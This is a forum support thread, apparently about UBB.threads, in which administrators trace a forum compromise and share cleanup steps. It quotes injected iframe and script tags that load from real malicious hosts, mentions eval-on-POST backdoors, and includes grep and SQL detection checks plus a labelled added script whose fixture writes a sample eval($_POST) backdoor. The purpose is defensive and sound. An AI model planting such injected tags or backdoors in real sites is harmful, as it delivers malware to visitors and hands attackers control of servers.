Joined: Sep 2008
Posts: 82
journeyman
You've gotta love Google... For some reason this response just struck me as funny on several levels:

Quote
Hello,

Thank you for submitting a report regarding unauthorized ad code on your site. Please be aware that these ads were placed on your website without our knowledge. If you haven't already done so, you can remove the ads from your site by deleting the ad code from your site's source. In addition, we suggest that you review your site’s security to ensure that unauthorized individuals aren't able to access your website's source code.

Please rest assured that we will investigate this matter and take the appropriate actions. However, we're unable to disclose any details about the investigation, including information about the account associated with the unauthorized ad code or our decision.

We appreciate your understanding.

Sincerely,

The Google AdSense Team

Joined: Apr 2004
Posts: 233
Likes: 1
Enthusiast
Does it appear that the hack got in through an attached file to a post? My board does not have attached files allowed so I'm wondering if my board may be susceptible.


DennyP - www.dennyp.com
DennyP Travel
Joined: Jan 2012
Posts: 95
journeyman
I don't know if this is related or not but our forums are down and I know of another site that had the same issue today.

I wonder if we ticked off this hacker by reporting to Google and he is retaliating. mad


Life is Good on Bremer Pond

Bremer Pond Weather
Joined: Dec 2003
Posts: 6,628
Likes: 85
Originally Posted by dbremer
I don't know if this is related or not but our forums are down and I know of another site that had the same issue today.

I wonder if we ticked off this hacker by reporting to Google and he is retaliating. mad
Well pondboss appears to be working currently.
Using the url of http://forums.pondboss.com/
So did something change?


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Joined: Jun 2011
Posts: 112
Sysop
looking into this, sending some logs to SD...

Joined: Apr 2007
Posts: 3,940
Likes: 1
SD
Former Developer
I've been looking at it with Rick too, since he is able to shell into a targeted server and watch closely wink

Joined: Jan 2012
Posts: 95
journeyman
It was a screw up at the hosting company. They rectified and said it won't happen again.

Sorry I didn't post sooner but I don't take an Internet machine with me when I am out fishing. crazy


Life is Good on Bremer Pond

Bremer Pond Weather
Joined: Sep 2008
Posts: 82
journeyman
Well, ours is down. I'm doing as much as I can from my iPhone at a waterpark, but we're getting a "Cannot decode raw data" error at the moment.

Joined: Dec 2003
Posts: 6,628
Likes: 85
Originally Posted by bakerzdosen
Well, ours is down. I'm doing as much as I can from my iPhone at a waterpark, but we're getting a "Cannot decode raw data" error at the moment.
I get a:
Quote
We encountered a problem. The reason reported was

Unable to connect to database server, please try again in a few minutes.

Please click back to return to the previous page.


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Joined: Sep 2008
Posts: 82
journeyman
Well, FWIW, I did something that might have been "dumb" (wouldn't be the first time in my life.)

I have a cronjob running (I alluded to in an earlier post) that deletes all php code from the writable directories. It's possible that may have interrupted the exploit...

Joined: Sep 2008
Posts: 82
journeyman
Well, in poking around a bit, I found this at the top of our includes/config.inc.php file:

Quote
<iframe src=http://www.ghananation.com/Alumni/photos/albums/ads.html width=116 height=1 frameborder=0></iframe>

Removing that fixed the problem.

Sheesh. I've gotta work on locking this down a LOT more. For now at least, I 744'd that file (which is owned by root.)

NOTE: You probably do NOT want to open that page if you're running a Microsoft operating system. Consider yourself warned.

Quote
This program must be run under Win32

Last edited by bakerzdosen; 09/03/2012 6:06 PM.
Joined: Mar 2007
Posts: 522
Addict
At least it's running now.


Steve

UBB.classic from 2000-2003
UBB.threads from 2003-present!
Joined: Jun 2006
Posts: 9,242
Likes: 1
Former Developer
Here's a few commands you'll want to run from shell to look for any more exploited code

grep -R eval * | grep POST
grep -R eval * | grep REQUEST

Found a few of these in various files on a couple servers that allowed for the hacker to pretty much do whatever they want.

Joined: Sep 2008
Posts: 82
journeyman
Rick,

I never mentioned: Thanks for that. I found two more places where they'd injected code in a similar manner. One in our includes/header.php file and one in a php file in images/forumimages/default/.

I'm becoming a chmod'ing fool on this server... I'm about to find out what happens when UBB is incredibly restricted due to permissions to the filesystem.
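
The checks from Rick's post and the findings reported in this thread, combined into one script as an added example; it is not part of the original thread or of UBB.threads. The function names, the example.invalid URL and the fixture files are constructed for illustration.

```shell
#!/bin/sh
# Added example, not code from the thread. Function names, the
# example.invalid URL and the fixture files are constructed.

# PHP files where eval() takes request input on the same line: the thread's
# two grep pipelines, limited to *.php and with a tighter pattern.
find_eval_on_input() {
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'eval[[:space:]]*\(.*\$_(POST|REQUEST)' {} + | sort
}

# PHP files carrying an <iframe> or <script> that loads from a remote URL,
# like the tag found at the top of includes/config.inc.php.
find_remote_tags() {
    find "$1" -type f -name '*.php' \
        -exec grep -liE '<(iframe|script)[^>]*src=.?https?://' {} + | sort
}

# Any PHP file under a directory that should hold only images or uploads.
find_php_in_upload_dir() {
    find "$1" -type f -name '*.php' | sort
}

# Constructed fixture: a tiny docroot with one clean file and three planted ones.
make_fixture() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/includes" "$root/images/forumimages/default"
    printf '%s\n' '<?php $config = array(); ?>' > "$root/includes/clean.php"
    printf '%s\n' '<iframe src=http://example.invalid/ads.html width=116 height=1></iframe>' \
        '<?php $config = array(); ?>' > "$root/includes/config.inc.php"
    printf '%s\n' '<?php eval($_POST["c"]); ?>' > "$root/includes/header.php"
    printf '%s\n' '<?php echo "x"; ?>' > "$root/images/forumimages/default/a.php"
    printf '%s\n' "$root"
}

root=$(make_fixture)
echo "eval on request input:";  find_eval_on_input "$root"
echo "remote iframe/script:";   find_remote_tags "$root"
echo "PHP in image directory:"; find_php_in_upload_dir "$root/images"
rm -rf "$root"
```

A hit from find_remote_tags needs a manual look, since legitimate templates also load remote scripts. The eval pattern only catches request input used on the same line as the eval call.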

Joined: Feb 2007
Posts: 48
journeyman
Originally Posted by Rick
Well, two of the sites I have worked on, every post in the database was modified, several million, adding this to the end of the POST_BODY field:

<script src=http://snipershide.com/wp-content/texashunting.js></script><br /><script src=http://snipershide.com/wp-content/texashunting.js></script><script src=http://snipershide.com/wp-content/texashunting.js></script><br /><iframe src=http://forums.weddingbells.ca/tmp/index.html width=750 height=110></iframe>

It's a somewhat easy cleanup with a mysql replace, but it takes quite awhile. Anyone with this issue, I'd look at your ubbt_POSTS table, specifically at the POST_BODY field. It won't show up when editing the post, because the POST_DEFAULT_BODY field isn't altered, so you'll need to use some type of mysql tool.

Quick way to check would be to run the following SQL:

select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'


We scrubbed Sniper's Hide and now we are just dealing with what is left on the two other sites,

forums.weddingbells.ca

forums.canadianfamily.ca

The hackers left several pieces of code and back doors in, but my biggest issue is the dump that pulls from these two other sites putting a huge load on our forum.

We have the latest software installed, the patches and all, but still we can't control what was inserted into other sites.

If anyone knows these two sites, have them scrub their pages, as it is still pulling from there.

Joined: Jun 2006
Posts: 16,366
Likes: 126
UBB.threads Developer
Could you have your server guys deny requests to the server from those IPs that're trolling content on your site?


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Feb 2007
Posts: 48
journeyman
I think they did, apparently it is not working.

Joined: Oct 2007
Posts: 464
Likes: 11
Addict
So did anyone ever figure out what the entry point was?


The Stovebolt Geek
https://www.stovebolt.com/ubbthreads/ubbthreads.php
